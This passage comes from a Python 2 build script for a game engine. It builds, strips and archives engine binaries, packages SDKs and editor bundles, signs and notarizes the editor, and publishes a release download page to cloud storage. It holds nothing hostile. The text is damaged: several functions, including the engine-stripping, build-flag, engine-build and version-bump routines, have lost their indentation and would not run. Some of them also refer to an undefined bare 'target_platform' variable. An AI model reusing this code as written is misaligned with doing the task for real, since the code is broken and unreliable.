        # For logging, print all paths in zip:
        for x in zip.namelist():
            print(x)
        zip.close()
        return outfile.name
    # NOTE(review): unreachable — the with-block above always returns.
    return None
def build_platform_sdk(self):
    """Build the platform SDK zip for the current target and report the
    resulting path (or the failure) on stdout."""
    # Helper function to make it easier to build a platform sdk locally
    try:
        path = self._package_platform_sdk(self.target_platform)
    except Exception, e:
        print "Failed to package sdk for platform %s: %s" % (self.target_platform, e)
    else:
        print "Wrote %s" % path
def build_builtins(self):
    """Zip the builtin game content into <dynamo_home>/share/builtins.zip."""
    content_dir = join(self.dynamo_home, 'content')
    archive_path = join(self.dynamo_home, 'share', 'builtins.zip')
    with open(archive_path, 'wb') as f:
        self._ziptree(join(content_dir, 'builtins'), outfile = f, directory = content_dir)
def _strip_engine(self, path):
""" Strips the debug symbols from an executable """
if self.target_platform not in ['x86_64-linux','x86_64-darwin','armv7-darwin','arm64-darwin','x86_64-ios','armv7-android','arm64-android']:
return False
sdkfolder = join(self.ext, 'SDKs')
strip = "strip"
if 'android' in self.target_platform:
ANDROID_NDK_VERSION = '20'
ANDROID_NDK_ROOT = os.path.join(sdkfolder,'android-ndk-r%s' % ANDROID_NDK_VERSION)
ANDROID_GCC_VERSION = '4.9'
if target_platform == 'armv7-android':
ANDROID_PLATFORM = 'arm-linux-androideabi'
elif target_platform == 'arm64-android':
ANDROID_PLATFORM = 'aarch64-linux-android'
ANDROID_HOST = 'linux' if sys.platform == 'linux2' else 'darwin'
strip = "%s/toolchains/%s-%s/prebuilt/%s-x86_64/bin/%s-strip" % (ANDROID_NDK_ROOT, ANDROID_PLATFORM, ANDROID_GCC_VERSION, ANDROID_HOST, ANDROID_PLATFORM)
if self.target_platform in ('x86_64-darwin','armv7-darwin','arm64-darwin','x86_64-ios') and 'linux2' == sys.platform:
strip = os.path.join(sdkfolder, 'linux', PACKAGES_LINUX_CLANG, 'bin', 'x86_64-apple-darwin19-strip')
run.shell_command("%s %s" % (strip, path))
return True
def archive_engine(self):
    """Upload all engine build artifacts for the current target platform to
    the archive under <sha1>/engine/..., including stripped binaries,
    symbols, shared docs/builtins and the packaged platform SDK."""
    sha1 = self._git_sha1()
    full_archive_path = join(sha1, 'engine', self.target_platform).replace('\\', '/')
    share_archive_path = join(sha1, 'engine', 'share').replace('\\', '/')
    java_archive_path = join(sha1, 'engine', 'share', 'java').replace('\\', '/')
    dynamo_home = self.dynamo_home
    self.full_archive_path = full_archive_path
    bin_dir = self.build_utility.get_binary_path()
    lib_dir = self.target_platform
    # upload editor 2.0 launcher
    if self.target_platform in ['x86_64-linux', 'x86_64-darwin', 'x86_64-win32']:
        launcher_name = format_exes("launcher", self.target_platform)[0]
        launcherbin = join(bin_dir, launcher_name)
        self.upload_to_archive(launcherbin, '%s/%s' % (full_archive_path, launcher_name))
    # upload gdc tool on desktop platforms
    if self.target_platform in ['x86_64-linux', 'x86_64-darwin', 'x86_64-win32']:
        gdc_name = format_exes("gdc", self.target_platform)[0]
        gdc_bin = join(bin_dir, gdc_name)
        self.upload_to_archive(gdc_bin, '%s/%s' % (full_archive_path, gdc_name))
    for n in ['dmengine', 'dmengine_release', 'dmengine_headless']:
        for engine_name in format_exes(n, self.target_platform):
            engine = join(bin_dir, engine_name)
            self.upload_to_archive(engine, '%s/%s' % (full_archive_path, engine_name))
            # Also upload a stripped copy when a strip toolchain exists.
            engine_stripped = join(bin_dir, engine_name + "_stripped")
            shutil.copy2(engine, engine_stripped)
            if self._strip_engine(engine_stripped):
                self.upload_to_archive(engine_stripped, '%s/stripped/%s' % (full_archive_path, engine_name))
            if 'win32' in self.target_platform:
                # Debug database for Windows binaries.
                pdb = join(bin_dir, os.path.splitext(engine_name)[0] + '.pdb')
                self.upload_to_archive(pdb, '%s/%s' % (full_archive_path, os.path.basename(pdb)))
            if 'web' in self.target_platform:
                # Emscripten side files (memory init + symbols), if produced.
                engine_mem = join(bin_dir, engine_name + '.mem')
                if os.path.exists(engine_mem):
                    self.upload_to_archive(engine_mem, '%s/%s.mem' % (full_archive_path, engine_name))
                engine_symbols = join(bin_dir, engine_name + '.symbols')
                if os.path.exists(engine_symbols):
                    self.upload_to_archive(engine_symbols, '%s/%s.symbols' % (full_archive_path, engine_name))
            elif 'darwin' in self.target_platform:
                # dSYM bundle zip for Apple targets, if produced.
                engine_symbols = join(bin_dir, engine_name + '.dSYM.zip')
                if os.path.exists(engine_symbols):
                    self.upload_to_archive(engine_symbols, '%s/%s' % (full_archive_path, os.path.basename(engine_symbols)))
    zip_archs = []
    if not self.skip_docs:
        zip_archs.append('ref-doc.zip')
    if not self.skip_builtins:
        zip_archs.append('builtins.zip')
    for zip_arch in zip_archs:
        self.upload_to_archive(join(dynamo_home, 'share', zip_arch), '%s/%s' % (share_archive_path, zip_arch))
    if self.target_platform == 'x86_64-linux':
        # NOTE: It's arbitrary for which platform we archive dlib.jar. Currently set to linux 64-bit
        self.upload_to_archive(join(dynamo_home, 'share', 'java', 'dlib.jar'), '%s/dlib.jar' % (java_archive_path))
    if 'android' in self.target_platform:
        files = [
            ('share/java', 'classes.dex'),
            ('bin/%s' % (self.target_platform), 'dmengine.apk'),
            ('ext/share/java', 'android.jar'),
        ]
        for f in files:
            src = join(dynamo_home, f[0], f[1])
            self.upload_to_archive(src, '%s/%s' % (full_archive_path, f[1]))
        # Bundle the android resource tree as a zip alongside the binaries.
        resources = self._ziptree(join(dynamo_home, 'ext', 'share', 'java', 'res'), directory = join(dynamo_home, 'ext', 'share', 'java'))
        self.upload_to_archive(resources, '%s/android-resources.zip' % (full_archive_path))
    if self.is_desktop_target():
        libs = ['texc', 'particle']
        for lib in libs:
            lib_name = format_lib('%s_shared' % (lib), self.target_platform)
            lib_path = join(dynamo_home, 'lib', lib_dir, lib_name)
            self.upload_to_archive(lib_path, '%s/%s' % (full_archive_path, lib_name))
    sdkpath = self._package_platform_sdk(self.target_platform)
    self.upload_to_archive(sdkpath, '%s/defoldsdk.zip' % full_archive_path)
def _get_build_flags(self):
supported_tests = {}
supported_tests['darwin'] = ['darwin', 'x86_64-darwin']
supported_tests['x86_64-win32'] = ['win32', 'x86_64-win32', 'arm64-nx64']
supports_tests = self.target_platform in supported_tests.get(self.host, []) or self.host == self.target_platform
skip_tests = '--skip-tests' if self.skip_tests or not supports_tests else ''
skip_codesign = '--skip-codesign' if self.skip_codesign else ''
disable_ccache = '--disable-ccache' if self.disable_ccache else ''
return {'skip_tests':skip_tests, 'skip_codesign':skip_codesign, 'disable_ccache':disable_ccache, 'prefix':None}
def get_base_platforms(self):
    # Base platforms is the platforms to build the base libs for.
    # The base libs are the libs needed to build bob, i.e. contains compiler code.
    dependencies = {
        'darwin': ['darwin', 'x86_64-darwin'],  # x86_64-darwin from IOS fix 3dea8222
        'x86_64-linux': [],
        'x86_64-win32': ['win32'],
    }
    platforms = list(dependencies.get(self.host, [self.host]))
    if self.host not in platforms:
        platforms.append(self.host)
    return platforms
def _build_engine_cmd(self, skip_tests, skip_codesign, disable_ccache, prefix):
prefix = prefix and prefix or self.dynamo_home
return 'python %s/ext/bin/waf --prefix=%s %s %s %s distclean configure build install' % (self.dynamo_home, prefix, skip_tests, skip_codesign, disable_ccache)
def _build_engine_lib(self, args, lib, platform, skip_tests = False, dir = 'engine'):
    """Run the waf build for one engine library in <defold_root>/<dir>/<lib>."""
    self._log('Building %s for %s' % (lib, platform))
    extra_flags = []
    # Only append test-skipping flags when the caller requested it and the
    # user has not already supplied --skip-build-tests on the command line.
    if skip_tests and '--skip-build-tests' not in self.waf_options:
        extra_flags = ['--skip-tests', '--skip-build-tests']
    cwd = join(self.defold_root, '%s/%s' % (dir, lib))
    full_cmd = args + ['--platform=%s' % platform] + self.waf_options + extra_flags
    run.env_command(self._form_env(), full_cmd, cwd = cwd)
def build_bob_light(self):
    """Build and install the lightweight bob content pipeline used during
    the engine build, via ant."""
    self._log('Building bob light')
    cwd = join(self.defold_root, 'com.dynamo.cr/com.dynamo.cr.bob')
    sha1 = self._git_sha1()
    # If this sha1 has an archive locally, pull prebuilt artefacts first.
    if os.path.exists(os.path.join(self.dynamo_home, 'archive', sha1)):
        run.env_shell_command(self._form_env(), "./scripts/copy.sh", cwd = cwd)
    env = self._form_env()
    ant_args = ['-logger', 'org.apache.tools.ant.listener.AnsiColorLogger']
    env['ANT_OPTS'] = '-Dant.logger.defaults=%s/ant-logger-colors.txt' % join(self.defold_root, 'com.dynamo.cr/com.dynamo.cr.bob.test')
    run.command(" ".join([join(self.dynamo_home, 'ext/share/ant/bin/ant'), 'clean', 'install-bob-light'] + ant_args),
                cwd = join(self.defold_root, 'com.dynamo.cr/com.dynamo.cr.bob'), shell = True, env = env)
def build_engine(self):
self.check_sdk()
# We want random folder to thoroughly test bob-light
# We dont' want it to unpack for _every_ single invocation during the build
os.environ['DM_BOB_ROOTFOLDER'] = tempfile.mkdtemp(prefix='bob-light-')
self._log("env DM_BOB_ROOTFOLDER=" + os.environ['DM_BOB_ROOTFOLDER'])
cmd = self._build_engine_cmd(**self._get_build_flags())
args = cmd.split()
host = self.host2
if 'x86-' in host:
host = self.host
if host == 'darwin':
host = 'x86_64-darwin'
# Make sure we build these for the host platform for the toolchain (bob light)
for lib in ['dlib', 'texc']:
skip_tests = host != self.target_platform
self._build_engine_lib(args, lib, host, skip_tests = skip_tests)
if not self.skip_bob_light:
# We must build bob-light, which builds content during the engine build
self.build_bob_light()
# Target libs to build
engine_libs = list(ENGINE_LIBS)
if host != self.target_platform:
engine_libs.insert(0, 'dlib')
if self.is_desktop_target():
engine_libs.insert(1, 'texc')
for lib in engine_libs:
if not build_private.is_library_supported(target_platform, lib):
continue
self._build_engine_lib(args, lib, target_platform)
self._build_engine_lib(args, 'extender', target_platform, dir = 'share')
if not self.skip_docs:
self.build_docs()
if not self.skip_builtins:
self.build_builtins()
if '--static-analyze' in self.waf_options:
scan_output_dir = os.path.normpath(os.path.join(os.environ['DYNAMO_HOME'], '..', '..', 'static_analyze'))
report_dir = os.path.normpath(os.path.join(os.environ['DYNAMO_HOME'], '..', '..', 'report'))
run.command(['python', './scripts/scan_build_gather_report.py', '-o', report_dir, '-i', scan_output_dir])
print("Wrote report to %s. Open with 'scan-view .' or 'python -m SimpleHTTPServer'" % report_dir)
shutil.rmtree(scan_output_dir)
if os.path.exists(os.environ['DM_BOB_ROOTFOLDER']):
print "Removing", os.environ['DM_BOB_ROOTFOLDER']
shutil.rmtree(os.environ['DM_BOB_ROOTFOLDER'])
def build_external(self):
    """Build and package every external library for the current target."""
    flags = self._get_build_flags()
    # External packages are installed into the repo's packages folder.
    flags['prefix'] = join(self.defold_root, 'packages')
    package_args = self._build_engine_cmd(**flags).split() + ['package']
    for lib in EXTERNAL_LIBS:
        self._build_engine_lib(package_args, lib, platform=self.target_platform, dir='external')
def build_go(self):
    """Build, test and install the go-based tools with the bundled Go
    toolchain, then copy the resulting binaries into <dynamo_home>/bin."""
    exe_ext = '.exe' if 'win32' in self.target_platform else ''
    go = '%s/ext/go/%s/go/bin/go%s' % (self.dynamo_home, self.target_platform, exe_ext)
    if not os.path.exists(go):
        self._log("Missing go for target platform, run install_ext with --platform set.")
        exit(5)
    run.env_command(self._form_env(), [go, 'clean', '-i', 'github.com/...'])
    run.env_command(self._form_env(), [go, 'install', 'github.com/...'])
    run.env_command(self._form_env(), [go, 'clean', '-i', 'defold/...'])
    if not self.skip_tests:
        run.env_command(self._form_env(), [go, 'test', 'defold/...'])
    run.env_command(self._form_env(), [go, 'install', 'defold/...'])
    for f in glob(join(self.defold, 'go', 'bin', '*')):
        shutil.copy(f, join(self.dynamo_home, 'bin'))
def archive_go(self):
    """Upload the built go binaries to the archive for the current sha1."""
    dest_root = join(self._git_sha1(), 'go', self.target_platform)
    for binary in glob(join(self.defold, 'go', 'bin', '*')):
        self.upload_to_archive(binary, '%s/%s' % (dest_root, basename(binary)))
def archive_bob(self):
    """Upload bob.jar to the archive for the current sha1."""
    dest_root = join(self._git_sha1(), 'bob').replace('\\', '/')
    for jar in glob(join(self.dynamo_home, 'share', 'java', 'bob.jar')):
        self.upload_to_archive(jar, '%s/%s' % (dest_root, basename(jar)))
def copy_local_bob_artefacts(self):
    """Copy locally built engine/tool artefacts into the bob source tree so
    a full bob.jar can be assembled without a remote archive.

    Missing artefacts are collected per category and reported at the end
    instead of failing the copy.
    """
    apkc_name = format_exes('apkc', self.host2)[0]
    texc_name = format_lib('texc_shared', self.host2)
    luajit_dir = tempfile.mkdtemp()
    cwd = join(self.defold_root, 'com.dynamo.cr/com.dynamo.cr.bob')
    missing = {}
    def add_missing(plf, txt):
        # NOTE(review): 'txts = txts.append(txt)' rebinds txts to None, but
        # the list stored in 'missing' has already been mutated, so the
        # bookkeeping still works.
        txts = []
        txts = missing.setdefault(plf, txts)
        txts = txts.append(txt)
    # Unpack the per-platform luajit packages and stage their executables.
    for plf in [['x86_64-win32', 'x86_64-win32'], ['x86_64-linux', 'x86_64-linux'], ['x86_64-darwin', 'x86_64-darwin']]:
        luajit_path = join(cwd, '../../packages/luajit-2.1.0-beta3-%s.tar.gz' % (plf[0]))
        if not os.path.exists(luajit_path):
            add_missing(plf[1], "package '%s' could not be found" % (luajit_path))
        else:
            self._extract(luajit_path, luajit_dir)
            luajit_exe = format_exes('luajit-32', plf[1])[0]
            luajit_exe_64 = format_exes('luajit-64', plf[1])[0]
            self._copy(join(luajit_dir, 'bin/%s/%s' % (plf[0], luajit_exe)), join(cwd, 'libexec/%s/%s' % (plf[1], luajit_exe)))
            self._copy(join(luajit_dir, 'bin/%s/%s' % (plf[0], luajit_exe_64)), join(cwd, 'libexec/%s/%s' % (plf[1], luajit_exe_64)))
    # Per-platform src->dst maps for the bundling dependencies.
    win32_files = dict([['ext/lib/%s/%s.dll' % (plf[0], lib), 'lib/%s/%s.dll' % (plf[1], lib)] for lib in ['OpenAL32', 'wrap_oal', 'PVRTexLib', 'msvcr120'] for plf in [['win32', 'x86-win32'], ['x86_64-win32', 'x86_64-win32']]])
    osx_files = dict([['ext/lib/%s/lib%s.dylib' % (plf[0], lib), 'lib/%s/lib%s.dylib' % (plf[1], lib)] for lib in ['PVRTexLib'] for plf in [['x86_64-darwin', 'x86_64-darwin']]])
    linux_files = dict([['ext/lib/%s/lib%s.so' % (plf[0], lib), 'lib/%s/lib%s.so' % (plf[1], lib)] for lib in ['PVRTexLib'] for plf in [['x86_64-linux', 'x86_64-linux']]])
    js_files = {}
    android_files = {'ext/bin/%s/%s' % (self.host2, apkc_name): 'libexec/%s/%s' % (self.host2, apkc_name),
                     'share/java/classes.dex': 'lib/classes.dex',
                     'ext/share/java/android.jar': 'lib/android.jar'}
    switch_files = {}
    # This dict is being built up and will eventually be used for copying in the end
    # - "type" - what the files are needed for, for error reporting
    # - pairs of src-file -> dst-file
    artefacts = {'generic': {'share/java/dlib.jar': 'lib/dlib.jar',
                             'share/builtins.zip': 'lib/builtins.zip',
                             'lib/%s/%s' % (self.host2, texc_name): 'lib/%s/%s' % (self.host2, texc_name)},
                 'android-bundling': android_files,
                 'win32-bundling': win32_files,
                 'js-bundling': js_files,
                 'ios-bundling': {},
                 'osx-bundling': osx_files,
                 'linux-bundling': linux_files,
                 'switch-bundling': switch_files}
    # Add dmengine to 'artefacts' procedurally
    for type, plfs in {'android-bundling': [['armv7-android', 'armv7-android'], ['arm64-android', 'arm64-android']],
                       'win32-bundling': [['win32', 'x86-win32'], ['x86_64-win32', 'x86_64-win32']],
                       'js-bundling': [['js-web', 'js-web'], ['wasm-web', 'wasm-web']],
                       'ios-bundling': [['armv7-darwin', 'armv7-darwin'], ['arm64-darwin', 'arm64-darwin'], ['x86_64-ios', 'x86_64-ios']],
                       'osx-bundling': [['x86_64-darwin', 'x86_64-darwin']],
                       'linux-bundling': [['x86_64-linux', 'x86_64-linux']],
                       'switch-bundling': [['arm64-nx64', 'arm64-nx64']]}.iteritems():
        # plfs is pairs of src-platform -> dst-platform
        for plf in plfs:
            exes = format_exes('dmengine', plf[1]) + format_exes('dmengine_release', plf[1])
            artefacts[type].update(dict([['bin/%s/%s' % (plf[0], exe), 'libexec/%s/%s' % (plf[1], exe)] for exe in exes]))
    # Perform the actual copy, or list which files are missing
    for type, files in artefacts.iteritems():
        m = []
        for src, dst in files.iteritems():
            src_path = join(self.dynamo_home, src)
            if not os.path.exists(src_path):
                m.append(src_path)
            else:
                dst_path = join(cwd, dst)
                self._mkdirs(os.path.dirname(dst_path))
                self._copy(src_path, dst_path)
        if m:
            add_missing(type, m)
    if missing:
        print('*** NOTE! There are missing artefacts.')
        print(json.dumps(missing, indent=2))
def build_bob(self):
    """Build and install bob.jar via ant, then run its tests unless
    --skip-tests was given.

    Artefacts come from the archive for this sha1 when available; otherwise
    they are copied from the local build tree.
    """
    cwd = join(self.defold_root, 'com.dynamo.cr/com.dynamo.cr.bob')
    sha1 = self._git_sha1()
    if os.path.exists(os.path.join(self.dynamo_home, 'archive', sha1)):
        run.env_shell_command(self._form_env(), "./scripts/copy.sh", cwd = cwd)
    else:
        self.copy_local_bob_artefacts()
    env = self._form_env()
    ant = join(self.dynamo_home, 'ext/share/ant/bin/ant')
    ant_args = ['-logger', 'org.apache.tools.ant.listener.AnsiColorLogger']
    env['ANT_OPTS'] = '-Dant.logger.defaults=%s/ant-logger-colors.txt' % join(self.defold_root, 'com.dynamo.cr/com.dynamo.cr.bob.test')
    cwd = join(self.defold_root, 'com.dynamo.cr/com.dynamo.cr.bob')
    args = [ant, 'clean', 'install'] + ant_args
    run.command(" ".join(args), cwd = cwd, shell = True, env = env, stdout = None)
    if not self.skip_tests:
        cwd = join(self.defold_root, 'com.dynamo.cr/com.dynamo.cr.bob.test')
        args = [ant, 'test-clean', 'test'] + ant_args
        run.command(" ".join(args), cwd = cwd, shell = True, env = env, stdout = None)
def build_sdk(self):
    # Assemble the cross-platform defoldsdk.zip: download every per-platform
    # sdk zip previously archived for this sha1, merge them into one tree,
    # and upload the combined archive.
    tempdir = tempfile.mkdtemp() # where the sdk ends up
    sha1 = self._git_sha1()
    u = urlparse.urlparse(self.get_archive_path())
    bucket = s3.get_bucket(u.netloc)
    # Strip the leading '/' from the bucket-relative path.
    root = urlparse.urlparse(self.get_archive_path()).path[1:]
    base_prefix = os.path.join(root, sha1)
    platforms = get_target_platforms()
    for platform in platforms:
        prefix = os.path.join(base_prefix, 'engine', platform, 'defoldsdk.zip')
        entry = bucket.get_key(prefix)
        if entry is None:
            raise Exception("Could not find sdk: %s" % prefix)
        platform_sdk_zip = tempfile.NamedTemporaryFile(delete = False)
        print "Downloading", entry.key
        entry.get_contents_to_filename(platform_sdk_zip.name)
        print "Downloaded", entry.key, "to", platform_sdk_zip.name
        self._extract_zip(platform_sdk_zip.name, tempdir)
        print "Extracted", platform_sdk_zip.name, "to", tempdir
        os.unlink(platform_sdk_zip.name)
        print ""
    treepath = os.path.join(tempdir, 'defoldsdk')
    sdkpath = self._ziptree(treepath, directory=tempdir)
    print "Packaged defold sdk"
    sdkurl = join(sha1, 'engine').replace('\\', '/')
    self.upload_to_archive(sdkpath, '%s/defoldsdk.zip' % sdkurl)
def build_docs(self):
    # Build the API reference docs via waf and pack them into share/ref-doc.zip.
    # Tests are skipped when cross-compiling (target != host).
    skip_tests = '--skip-tests' if self.skip_tests or self.target_platform != self.host else ''
    self._log('Building API docs')
    cwd = join(self.defold_root, 'engine/docs')
    cmd = 'python %s/ext/bin/waf configure --prefix=%s %s distclean configure build install' % (self.dynamo_home, self.dynamo_home, skip_tests)
    run.env_command(self._form_env(), cmd.split() + self.waf_options, cwd = cwd)
    with open(join(self.dynamo_home, 'share', 'ref-doc.zip'), 'wb') as f:
        self._ziptree(join(self.dynamo_home, 'share', 'doc'), outfile = f, directory = join(self.dynamo_home, 'share'))
# ------------------------------------------------------------
# BEGIN: EDITOR 2
#
def download_editor2(self):
    """Fetch the previously archived editor bundle for this platform/sha1."""
    bundle_name = "Defold-%s.zip" % self.target_platform
    local_target = join(self.defold_root, 'editor', 'target', 'editor', bundle_name)
    remote_path = join(self._git_sha1(), self.channel, 'editor2', bundle_name)
    self.download_from_archive(remote_path, local_target)
def archive_editor2(self):
    """Upload the editor zip (and dmg, when present) to the archive and wait."""
    target_dir = join(self.defold_root, 'editor', 'target', 'editor')
    dest_prefix = join(self._git_sha1(), self.channel, 'editor2')
    # Upload whichever bundle files exist locally (zip first, then dmg).
    for bundle in ("Defold-%s.zip" % self.target_platform,
                   "Defold-%s.dmg" % self.target_platform):
        local_path = join(target_dir, bundle)
        if os.path.exists(local_path):
            self.upload_to_archive(local_path, '%s/%s' % (dest_prefix, bundle))
    self.wait_uploads()
def run_editor_script(self, cmd):
    """Run *cmd* from the editor directory with the build environment set."""
    editor_dir = join(self.defold_root, 'editor')
    run.env_command(self._form_env(), cmd, cwd = editor_dir)
def build_editor2(self):
    """Build the editor via scripts/bundle.py; forward --skip-tests on request."""
    flags = ['--engine-artifacts=%s' % self.engine_artifacts]
    cmd = ['./scripts/bundle.py'] + flags + ['build']
    if self.skip_tests:
        cmd = cmd + ["--skip-tests"]
    self.run_editor_script(cmd)
def bundle_editor2(self):
    """Bundle the editor (zip) for the configured platform/version/channel."""
    options = [
        '--platform=%s' % self.target_platform,
        '--version=%s' % self.version,
        '--channel=%s' % self.channel,
        '--engine-artifacts=%s' % self.engine_artifacts,
    ]
    self.run_editor_script(['./scripts/bundle.py'] + options + ['bundle'])
def sign_editor2(self):
    # Codesign the bundled editor. With --skip-codesign only that flag is
    # forwarded; otherwise the configured Windows/macOS signing credentials
    # are passed on to scripts/bundle.py.
    editor_bundle_dir = join(self.defold_root, 'editor', 'target', 'editor')
    cmd = ['./scripts/bundle.py',
           '--platform=%s' % self.target_platform,
           '--bundle-dir=%s' % editor_bundle_dir,
           'sign']
    if self.skip_codesign:
        cmd.append('--skip-codesign')
    else:
        if self.windows_cert:
            cmd.append('--windows-cert="%s"' % self.windows_cert)
        if self.windows_cert_pass:
            cmd.append('--windows-cert-pass="%s"' % self.windows_cert_pass)
        if self.codesigning_identity:
            cmd.append('--codesigning-identity="%s"' % self.codesigning_identity)
    self.run_editor_script(cmd)
def notarize_editor2(self):
    # macOS only: build the dmg installer and submit it to Apple for
    # notarization with the configured credentials.
    if self.target_platform != "x86_64-darwin":
        return
    editor_bundle_dir = join(self.defold_root, 'editor', 'target', 'editor')
    # create dmg installer
    cmd = ['./scripts/bundle.py',
           '--platform=x86_64-darwin',
           '--bundle-dir=%s' % editor_bundle_dir,
           'installer']
    if self.skip_codesign:
        cmd.append('--skip-codesign')
    else:
        if self.codesigning_identity:
            cmd.append('--codesigning-identity="%s"' % self.codesigning_identity)
    self.run_editor_script(cmd)
    # notarize dmg
    editor_dmg = join(editor_bundle_dir, 'Defold-x86_64-darwin.dmg')
    cmd = ['./scripts/notarize.py',
           editor_dmg,
           self.notarization_username,
           self.notarization_password,
           self.notarization_itc_provider]
    self.run_editor_script(cmd)
#
# END: EDITOR 2
# ------------------------------------------------------------
def bump(self):
sha1 = self._git_sha1()
with open('VERSION', 'r') as f:
current = f.readlines()[0].strip()
if self.set_version:
new_version = self.set_version
else:
lst = map(int, current.split('.'))
lst[-1] += 1
new_version = '.'.join(map(str, lst))
with open('VERSION', 'w') as f:
f.write(new_version)
print 'Bumping engine version from %s to %s' % (current, new_version)
print 'Review changes and commit'
def save_env(self):
    """Write the build environment as shell 'export' lines to --save-env-path."""
    if not self.save_env_path:
        self._log("No --save-env-path set when trying to save environment export")
        return
    env = self._form_env()
    # Only export names that are plain shell identifiers; collect the lines
    # and join once instead of quadratic string concatenation. The redundant
    # bool() around re.match is also gone.
    lines = []
    for key in env:
        if re.match('^[a-zA-Z0-9_]+$', key):
            lines.append("export %s='%s'\n" % (key, env[key]))
    with open(self.save_env_path, "w") as f:
        f.write(''.join(lines))
def shell(self):
    # Spawn an interactive login shell with the full build environment set.
    print 'Setting up shell with DYNAMO_HOME, PATH, ANDROID_HOME and LD_LIBRARY_PATH/DYLD_LIBRARY_PATH (where applicable) set'
    if "win32" in self.host:
        preexec_fn = None
    else:
        # Run the emscripten sanity check in the child before exec.
        preexec_fn = self.check_ems
    process = subprocess.Popen([SHELL, '-l'], env = self._form_env(), preexec_fn=preexec_fn)
    # NOTE(review): stdout is not piped, so communicate() returns (None, None)
    # and the _log(output) below logs None on failure — confirm intent.
    output = process.communicate()[0]
    if process.returncode != 0:
        self._log(output)
        sys.exit(process.returncode)
# ------------------------------------------------------------
# BEGIN: RELEASE
#
def release(self):
    # Publish a release for the current channel: render the download page
    # from the Mustache template below, then upload index.html, info.json,
    # the editor update-v3.json and stable download-redirect keys to the
    # release S3 bucket.
    page = """
<!DOCTYPE html>
<html>
<head>
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <title>Defold Downloads</title>
    <link href='//fonts.googleapis.com/css?family=Open+Sans:400,300' rel='stylesheet' type='text/css'>
    <link rel="stylesheet" href="//d.defold.com/static/bootstrap/css/bootstrap.min.css">
    <style>
        body {
            padding-top: 50px;
        }
        .starter-template {
            padding: 40px 15px;
            text-align: center;
        }
    </style>
</head>
<body>
    <div class="navbar navbar-fixed-top">
        <div class="navbar-inner">
            <div class="container">
                <a class="brand" href="/">Defold Downloads</a>
                <ul class="nav">
                </ul>
            </div>
        </div>
    </div>
    <div class="container">
        <div id="releases"></div>
        <script src="//ajax.googleapis.com/ajax/libs/jquery/1.11.0/jquery.min.js"></script>
        <script src="//d.defold.com/static/bootstrap/js/bootstrap.min.js"></script>
        <script src="//cdnjs.cloudflare.com/ajax/libs/mustache.js/0.7.2/mustache.min.js"></script>
        <script id="templ-releases" type="text/html">
            <h2>{{release.channel}} {{release.version}}</h2>
            {{#release.editor}}
            <p>
                <a href="{{url}}" class="btn btn-primary" style="width: 20em;" role="button">Download for {{name}}</a>
            </p>
            {{/release.editor}}
            {{#has_releases}}
            <h2>Releases</h2>
            {{/has_releases}}
            {{#releases}}
            <div class="panel-group" id="accordion">
                <div class="panel panel-default">
                    <div class="panel-heading">
                        <h4 class="panel-title">
                            <a data-toggle="collapse" data-parent="#accordion" href="#{{sha1}}">
                                <h3>{{tag}} <small>{{date}} ({{abbrevsha1}})</small></h3>
                            </a>
                        </h4>
                    </div>
                    <div id="{{sha1}}" class="panel-collapse collapse ">
                        <div class="panel-body">
                            <table class="table table-striped">
                                <tbody>
                                    {{#files}}
                                    <tr><td><a href="{{path}}">{{name}}</a></td></tr>
                                    {{/files}}
                                    {{^files}}
                                    <i>No files</i>
                                    {{/files}}
                                </tbody>
                            </table>
                        </div>
                    </div>
                </div>
            </div>
            {{/releases}}
        </script>
        <script>
            var model = %(model)s
            var output = Mustache.render($('#templ-releases').html(), model);
            $("#releases").html(output);
        </script>
    </body>
</html>
"""
    if run.shell_command('git config -l').find('remote.origin.url') != -1 and os.environ.get('GITHUB_WORKFLOW', None) is None:
        # NOTE: Only run fetch when we have a configured remote branch.
        # When running on buildbot we don't but fetching should not be required either
        # as we're already up-to-date
        self._log('Running git fetch to get latest tags and refs...')
        run.shell_command('git fetch')
    u = urlparse.urlparse(self.get_archive_path())
    hostname = u.hostname
    bucket = s3.get_bucket(hostname)
    model = {'releases': [],
             'has_releases': False}
    if self.channel == 'stable':
        # Move artifacts to a separate page?
        model['releases'] = s3.get_tagged_releases(self.get_archive_path())
        model['has_releases'] = True
    else:
        model['releases'] = s3.get_single_release(self.get_archive_path(), self.version, self._git_sha1())
        model['has_releases'] = True
    if not model['releases']:
        raise Exception('Unable to find any releases')
    # NOTE
    # - The stable channel is based on the latest tag
    # - The beta and alpha channels are based on the latest
    #   commit in their branches, i.e. origin/dev for alpha
    if self.channel == 'stable':
        release_sha1 = model['releases'][0]['sha1']
    else:
        release_sha1 = self._git_sha1()
    # Ask for confirmation when run interactively from a terminal.
    if sys.stdin.isatty():
        sys.stdout.write('Release %s with SHA1 %s to channel %s? [y/n]: ' % (self.version, release_sha1, self.channel))
        response = sys.stdin.readline()
        if response[0] != 'y':
            return
    model['release'] = { 'channel': "Unknown", 'version': self.version }
    if self.channel:
        model['release']['channel'] = self.channel.capitalize()
    # We handle the stable channel seperately, since we want it to point
    # to the editor-dev release (which uses the latest stable engine).
    editor_channel = None
    if self.channel == "stable":
        editor_channel = "editor-alpha"
    else:
        editor_channel = self.channel or "stable"
    editor_archive_path = urlparse.urlparse(self.get_archive_path(editor_channel)).path
    editor_download_url = "https://%s%s/%s/%s/editor2/" % (hostname, editor_archive_path, release_sha1, editor_channel)
    model['release'] = {'editor': [ dict(name='macOS 10.11+', url=editor_download_url + 'Defold-x86_64-darwin.dmg'),
                                    dict(name='macOS 10.7-10.10', url=editor_download_url + 'Defold-x86_64-darwin.zip'),
                                    dict(name='Windows', url=editor_download_url + 'Defold-x86_64-win32.zip'),
                                    dict(name='Ubuntu 16.04+', url=editor_download_url + 'Defold-x86_64-linux.zip')] }
    # NOTE: We upload index.html to /CHANNEL/index.html
    # The root-index, /index.html, redirects to /stable/index.html
    self._log('Uploading %s/index.html' % self.channel)
    html = page % {'model': json.dumps(model)}
    key = bucket.new_key('%s/index.html' % self.channel)
    key.content_type = 'text/html'
    key.set_contents_from_string(html)
    self._log('Uploading %s/info.json' % self.channel)
    key = bucket.new_key('%s/info.json' % self.channel)
    key.content_type = 'application/json'
    key.set_contents_from_string(json.dumps({'version': self.version,
                                             'sha1' : release_sha1}))
    # Editor update-v3.json
    key_v3 = bucket.new_key('editor2/channels/%s/update-v3.json' % self.channel)
    key_v3.content_type = 'application/json'
    self._log("Updating channel '%s' for update-v3.json: %s" % (self.channel, key_v3))
    key_v3.set_contents_from_string(json.dumps({'sha1': release_sha1}))
